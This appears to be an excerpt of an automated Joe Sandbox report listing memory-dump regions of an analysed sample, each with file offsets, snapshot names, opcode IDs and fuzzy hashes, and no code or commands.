                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ec6507dc887b87bf5cf13f513826d989cbed9aa490b9d4b50dcee991740c9d8
                                                              • Instruction ID: 781a044b12eb3bbc0085a99bc09f5e52b23b042a6737ba726ae7b3d764bf6595
                                                              • Opcode Fuzzy Hash: 1ec6507dc887b87bf5cf13f513826d989cbed9aa490b9d4b50dcee991740c9d8
                                                              • Instruction Fuzzy Hash: A3211734600205CFDB59DF78D569BAD7BF2BF89300B104469E406EB365EB329D01DB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b21c86091f185518a3c352e0bd47123e07b35a97fa6057916544b4e31f87113b
                                                              • Instruction ID: c80acba3ee9e264484c0c8b42664d472c9a0510a7c2766b7d61a2b7cc3b2f287
                                                              • Opcode Fuzzy Hash: b21c86091f185518a3c352e0bd47123e07b35a97fa6057916544b4e31f87113b
                                                              • Instruction Fuzzy Hash: 3A216231E002099BDB1ACFA4D8546DEFBB6BF89304F14851AE916BB350DB70E846CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 56caa57a78ec365587cee9836074077efaa902f463d915f8606fec447c038dff
                                                              • Instruction ID: b948ab6397dabeac31d0be8ef86c77f0b76351552d3bae2ce352cb4e828e06a9
                                                              • Opcode Fuzzy Hash: 56caa57a78ec365587cee9836074077efaa902f463d915f8606fec447c038dff
                                                              • Instruction Fuzzy Hash: 2F213D30B00605CFDB55DB68C5646EE77F6BF89214F204469D10AEB3A4DB358D40CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9806867b3d38f5b7ab7ceba60d4dd5fa6aedbf4327a67a324ceb391df0662b98
                                                              • Instruction ID: 84c3b358e092b803944d453308dcde6bb3d495f533dead1988824470cf671be8
                                                              • Opcode Fuzzy Hash: 9806867b3d38f5b7ab7ceba60d4dd5fa6aedbf4327a67a324ceb391df0662b98
                                                              • Instruction Fuzzy Hash: 902190746005018FEF67EB38E998B9D7B55FB41344F60A921D00ECB76DEB20D8898BD6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59878e7e707482fb1fea84a38c6435d995393f2b1a7f6ab4f9d918dbac0fb87a
                                                              • Instruction ID: d989bb9996bc096f65387cf4454022e15129cf6de651da8a76cd7b39cb26d124
                                                              • Opcode Fuzzy Hash: 59878e7e707482fb1fea84a38c6435d995393f2b1a7f6ab4f9d918dbac0fb87a
                                                              • Instruction Fuzzy Hash: A321E934710209CFDB59DB78D968BAD7BF1BF89304B104469E406EB365EB369D00CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 333fa8b61661bd12073aa5c8c80bea89aa4db00fcd09fc0b6d5033d925ee1594
                                                              • Instruction ID: 36851b77ccafe1ffec8cdd2c8ef089f588acf9518ebb215b1a5e07d9c18e5bff
                                                              • Opcode Fuzzy Hash: 333fa8b61661bd12073aa5c8c80bea89aa4db00fcd09fc0b6d5033d925ee1594
                                                              • Instruction Fuzzy Hash: 7E117F31E006558FCB52EFB884942EEBBB1FF85314B1444B9D409EB201E731D842CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f689107c324c489aad19cf486de883c50a1f25bf05b600d3e17f640eb163033
                                                              • Instruction ID: 69e7e14750209e123d110f859aa0820ac35697512a1b475212f9a1dc62a1164a
                                                              • Opcode Fuzzy Hash: 9f689107c324c489aad19cf486de883c50a1f25bf05b600d3e17f640eb163033
                                                              • Instruction Fuzzy Hash: 3F118F30B002048FEF66AA78D4403AF7A96FF45364F208939E006DF395DB61CA858BC9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4140c37449b71286a569b0285b8fe9cdcdbb3f5ab63fae5e2b91081225363226
                                                              • Instruction ID: 152427724ef65922a607e07cefc92e14486c3e9fa42c8bf70a63594ee6379a8b
                                                              • Opcode Fuzzy Hash: 4140c37449b71286a569b0285b8fe9cdcdbb3f5ab63fae5e2b91081225363226
                                                              • Instruction Fuzzy Hash: E3118230A042048BEF27577494503AF7B61FF46264F24897AE046DB2D5DB65CA868BC9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16e55798a67bcbdcb290dceef647821bbd5601d321e7a7317cc6acdc3769ca83
                                                              • Instruction ID: c09da2a4366c29157530b64f9f136f794938eac65c03d811b5747b8316111a88
                                                              • Opcode Fuzzy Hash: 16e55798a67bcbdcb290dceef647821bbd5601d321e7a7317cc6acdc3769ca83
                                                              • Instruction Fuzzy Hash: 08110235F006019FCB62AF74985866F7BFAFF88660F108829E909D3344EB30C8568B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888221637.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_86d000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                              • Instruction ID: 6fc87f2acf4218211bccc5b165da801678694453574ac9142467dde9d62b6925
                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                              • Instruction Fuzzy Hash: E511BB75A04780CFCB11CF14D5C4B15FBA1FB84314F28C6AAD8498B656C33AD84ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c0b00a539ad860d0993e83f6a01f6a1b38014bc520e336d6a5e47b717e82028
                                                              • Instruction ID: f94919187b3694043170a704225ad6d239d8d37577c065a1ea9f5ae84383de45
                                                              • Opcode Fuzzy Hash: 5c0b00a539ad860d0993e83f6a01f6a1b38014bc520e336d6a5e47b717e82028
                                                              • Instruction Fuzzy Hash: 1C012D31F006158FCF62EFB884642EEBBE6FF88314B1444B9D809E7241E735D9418BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47be5f1692e7801d0048100170f0706093c349ccfae226af6e8e02ee254a0089
                                                              • Instruction ID: e23a4fc5cddd986a19745e29a9869627413692be32a805a8d13027505ac92f36
                                                              • Opcode Fuzzy Hash: 47be5f1692e7801d0048100170f0706093c349ccfae226af6e8e02ee254a0089
                                                              • Instruction Fuzzy Hash: 0F012939B00504CFD719DB74D558A6D7BB2FF88225B5654A9E40ACB374CB309D82CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8a3ce049a8aea6b4695d97e167ed5afdaaae852212abdd8075f7833b98c5a754
                                                              • Instruction ID: 87f37ff9a1ed3602d68ac26df9fed4de212e2410dc03625b7e2e119454209a95
                                                              • Opcode Fuzzy Hash: 8a3ce049a8aea6b4695d97e167ed5afdaaae852212abdd8075f7833b98c5a754
                                                              • Instruction Fuzzy Hash: 50018474900208AFDB05EBB8E991A9CBBB5EF40344F6455B4C4049B369DF30AA4A9782
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b13c100dbe1392b1ee443e082eeb5a98838c687e0c50efdee61c361d3078457e
                                                              • Instruction ID: c9d467ed6597816c47b2922a420c395e8d0b63c05468ba2859ccc8e8bb3e205c
                                                              • Opcode Fuzzy Hash: b13c100dbe1392b1ee443e082eeb5a98838c687e0c50efdee61c361d3078457e
                                                              • Instruction Fuzzy Hash: 0FF04434A10209AFDB05FFA8F981A9DBBB5EB40344F605578C4049736CDF306E499BD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b6df10e9322045a7367e1ffbffdbfde5f815be7b7298a3a91ce1ed7444b25f4
                                                              • Instruction ID: ac69f0106ba2341779f28f35263c4e22cb95839e614d92a723eb0d343ba86b88
                                                              • Opcode Fuzzy Hash: 2b6df10e9322045a7367e1ffbffdbfde5f815be7b7298a3a91ce1ed7444b25f4
                                                              • Instruction Fuzzy Hash: DDB16E70E002098FDF21CFA9D8957EEBBF2BF88304F148529D415A7295EB749895CF85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%